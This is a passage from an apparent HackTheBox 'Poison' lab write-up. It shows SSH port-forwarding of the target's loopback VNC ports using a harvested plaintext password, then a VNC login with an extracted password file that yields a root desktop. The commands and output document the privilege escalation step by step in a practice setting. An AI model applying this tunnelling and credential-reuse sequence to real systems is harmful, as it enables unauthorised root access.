VNC
I discovered that the target system is hosting a VNC server over HTTP on the loopback address.
In order to access the VNC server, I would need to tunnel it
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ sshpass -p 'charix!2#4%6&8(0' ssh -l 5801:127.0.0.1:5801 -N -f charix@$IP
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ sshpass -p 'charix!2#4%6&8(0' ssh -l 5901:127.0.0.1:5901 -N -f charix@$IPSince SSH is available, I will use it to tunnel both port 5801 and 5901 of the target loopback to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 100817/ssh
tcp 0 0 127.0.0.1:5801 0.0.0.0:* LISTEN 100593/ssh Those VNC servers running on the target loopback are now available on Kali via SSH Tunneling
Privilege Escalation
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ vncviewer -passwd secret 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
desktop name "root's x desktop (poison:1)"
vnc server default format:
32 bits per pixel.
Least significant byte first in each pixel.
true colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
using default colormap which is truecolor. pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
true colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
same machine: preferring raw encodingVNC can take a password file as an authentication method.
The secret file that extracted from the archive turns out to be the password file for the VNC server
A TightVNC client window is open
I am the root user
System Level Compromise